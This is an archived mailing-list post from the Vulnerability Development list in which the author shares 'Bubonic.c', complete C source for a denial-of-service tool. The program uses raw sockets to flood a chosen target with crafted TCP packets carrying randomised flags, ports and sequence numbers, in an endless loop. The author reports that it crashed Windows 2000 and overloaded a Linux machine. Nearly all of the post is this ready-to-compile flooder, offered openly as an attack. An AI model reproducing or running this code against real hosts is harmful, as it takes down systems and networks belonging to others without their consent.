Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Win2k & Linux DoS

From: "J. Oquendo" <intrusion () ENGINEER COM>
Date: Fri, 25 Aug 2000 11:50:24 -0400
Greetings everyone. While tampering with random codes when building a theoretical tool I managed to crash my 
Windows2000 laptop by randomizing TCP settings. At first it wasn't a big deal since MS has gotten me used to seeing 
error codes with dumps for just about anything.

Seems this code which was in no way specified to attack any specific OS brings the load up to extreme levels and is not 
limited to Win2K either.

Written on an Ultra5 running Linux (zoot) I managed to drive this load up high after about 3 minutes forcing the 
machine to lag drastically.

So in essence I give to you Bubonic.c maybe someone else can benchmark it and figure out whats going on.

Error code received during thw WinCrash was:

STOP 0x00000041
(0x00001000,0x00001279,0x0000042a,0x00000001)
MUST_SUCCEED_POOL_EMPTY

-------- SNIP TO CODE --------

/*

 * Bubonic.c lame DoS against Windows 2000 machines
 * and certain versions of Linux (worked against an Ultra5
 * running Redhat Zoot. Should compile under anything.
 * Randomly sends TCP packets with random settings, etc.

 * Brings the load up causing the box to crash with
 * error code:

 * STOP 0x00000041 (0x00001000,0x00001279,0x000042A,0x00000001)
 * MUST_SUCCEED_POOL_EMPTY

 * CODE RIPPED FROM MY OTHER BGP KILLER WITH SETTINGS TWEAKED.
 * WEE MULTICODE... www.antioffline.com/daemonic.c

 * shouts... hrmm fsck it why not...
 * #unixgods on the efnet, jhh, iggie, rajak, speye, obecian,
 * qwer7y, m3th, god-, tattooman, spikeman, and my wife.
 * Can't forget security staff all over the place.

 * Logs for the packets sent at www.antioffline.com/logged
 * Windows2K screen shots at www.antioffline.com/loads.html
 */


#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <strings.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>

#ifndef __USE_BSD
#define __USE_BSD

#endif

#ifndef __FAVOR_BSD

#define __FAVOR_BSD

#endif

#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>

#ifdef LINUX
#define FIX(x)  htons(x)

#else

#define FIX(x)  (x)
#endif

struct ip_hdr {
    u_int       ip_hl:4,
                ip_v:4;
    u_char      ip_tos;
    u_short     ip_len;
    u_short     ip_id;
    u_short     ip_off;
    u_char      ip_ttl;
    u_char      ip_p;
    u_short     ip_sum;
    u_long      saddr, daddr;
};

struct tcp_hdr {
    u_short     th_sport;
    u_short     th_dport;
    u_long      th_seq;
    u_long      th_syn;
    u_int       th_x2:4,
                th_off:4;
    u_char      th_flags;
    u_short     th_win;
    u_short     th_sum;
    u_short     th_urp;
};

struct tcpopt_hdr {
    u_char  type;
    u_char  len;
    u_short value;
};

struct pseudo_hdr {
    u_long saddr, daddr;
    u_char mbz, ptcl;
    u_short tcpl;
};

struct packet {
    struct ip/*_hdr*/ ip;
    struct tcphdr tcp;
};

struct cksum {
    struct pseudo_hdr pseudo;
    struct tcphdr tcp;
};

struct packet packet;
struct cksum cksum;
struct sockaddr_in s_in;
u_short bgport, bgsize, pps;
u_long radd;
u_long sradd;
int sock;

void usage(char *progname)
{
    fprintf(stderr, "Usage: %s <dst> <src> <size> <number>\n", progname);
    fprintf(stderr, "Ports are set to send and receive on port 179\n");
    fprintf(stderr, "dst:\tDestination Address\n");
    fprintf(stderr, "src:\tSource Address\n");
    fprintf(stderr, "size:\tSize of packet which should be no larger than 1024 should allow for xtra header info thru 
routes\n");
    fprintf(stderr, "num:\tpackets\n\n");
    exit(1);
}

inline u_short in_cksum(u_short *addr, int len)
{
    register int nleft = len;
    register u_short *w = addr;
    register int sum = 0;
    u_short answer = 0;
     while (nleft > 1)  {
         sum += *w++;
         nleft -= 2;
     }
     if (nleft == 1) {
         *(u_char *)(&answer) = *(u_char *) w;
         sum += answer;
     }
     sum = (sum >> 16) + (sum & 0xffff);
     sum += (sum >> 16);
     answer = ~sum;
     return(answer);
}

u_long lookup(char *hostname)
{
    struct hostent *hp;

    if ((hp = gethostbyname(hostname)) == NULL) {
       fprintf(stderr, "Could not resolve %s fucknut\n", hostname);
       exit(1);
    }

    return *(u_long *)hp->h_addr;
}


void flooder(void)
{
    struct timespec ts;
    int i;


    memset(&packet, 0, sizeof(packet));

    ts.tv_sec                   = 0;
    ts.tv_nsec                  = 10;

    packet.ip.ip_hl             = 5;
    packet.ip.ip_v              = 4;
    packet.ip.ip_p              = IPPROTO_TCP;
    packet.ip.ip_tos            = rand();
    packet.ip.ip_id             = radd;
    packet.ip.ip_len            = FIX(sizeof(packet));
    packet.ip.ip_off            = 0;
    packet.ip.ip_ttl            = 255;
    packet.ip.ip_dst.s_addr     = radd;

    packet.tcp.th_flags         = random();
    packet.tcp.th_win           = 65535;
    packet.tcp.th_seq           = random();
    packet.tcp.th_ack           = 0;
    packet.tcp.th_off           = 0;
    packet.tcp.th_urp           = random();
    packet.tcp.th_dport         = random();
    cksum.pseudo.daddr          = sradd;
    cksum.pseudo.mbz            = 0;
    cksum.pseudo.ptcl           = IPPROTO_TCP;
    cksum.pseudo.tcpl           = random();

    s_in.sin_family             = AF_INET;
    s_in.sin_addr.s_addr        = sradd;
    s_in.sin_port               = packet.tcp.th_dport;

    for(i=0;;++i) {
    if( !(i&0x3FF) ) {
        packet.tcp.th_sport = rand();
        cksum.pseudo.saddr = packet.ip.ip_src.s_addr = sradd;
        packet.tcp.th_flags = random();
        packet.tcp.th_ack   = rand();

    }
    else {
        packet.tcp.th_flags = rand();
        packet.tcp.th_ack = rand();
    }
       ++packet.ip.ip_id;
       /*++packet.tcp.th_sport*/;
       ++packet.tcp.th_seq;

       if (!bgport)
          s_in.sin_port = packet.tcp.th_dport = rand();

       packet.ip.ip_sum         = 0;
       packet.tcp.th_sum        = 0;

       cksum.tcp                = packet.tcp;

       packet.ip.ip_sum         = in_cksum((void *)&packet.ip, 20);
       packet.tcp.th_sum        = in_cksum((void *)&cksum, sizeof(cksum));

       if (sendto(sock, &packet, sizeof(packet), 0, (struct sockaddr *)&s_in, sizeof(s_in)) < 0);

    }
}

int main(int argc, char *argv[])
{
    int on = 1;

    printf("Bubonic -- sil () antioffline com\n\n");

    if ((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
       perror("socket");
       exit(1);
    }

    setgid(getgid()); setuid(getuid());

    if (argc < 4)
       usage(argv[0]);

    if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) < 0)

{
       perror("setsockopt");
       exit(1);

    }

    srand((time(NULL) ^ getpid()) + getppid());

    printf("\nFinding host\n"); fflush(stdout);

    radd        = lookup(argv[1]);
    bgport      = atoi(argv[3]);
    bgsize      = atoi(argv[4]);
    sradd       = lookup(argv[2]);
    printf("AntiOffline -- Putting the Hero in Heroin\n");

    flooder();

    return 0;
}

______________________________________________
FREE Personalized Email at Mail.com
Sign up at http://www.mail.com/?sr=signup

Attachment: bubonic.c
Description:

Previous By Date Next
Previous By Thread Next

Current thread: